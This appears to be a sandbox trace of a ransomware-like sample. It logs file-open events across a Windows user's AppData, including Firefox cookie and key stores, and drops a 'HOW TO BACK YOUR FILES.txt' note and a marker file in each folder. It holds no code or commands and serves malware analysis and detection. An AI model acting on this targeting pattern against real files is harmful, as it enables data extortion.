Create C:\Users\FD1HVy\AppData\Roaming\N8MfSDtCG2.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\nrGPsGERgaDJPgPU.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\PeXqoZ-.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\pQptGfPg-Sv0bZ6J39X.mkv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\r6veU.mp4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\shbgybF2YTr 4USG.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\SIxZckh.mp3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\SU1bhi PYyXL.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\u2g_PYJZ.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\uK 4SUFJ.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\UOXinrBcB5E_5943Ki.docx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\WORvZy.jpg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Yffge-8ET9yiGGQUqj.avi desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\YwMCDPenkGT OtMk.m4a desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\zS4b8o-pTT999 Cto.swf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\ZuEh.wav desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
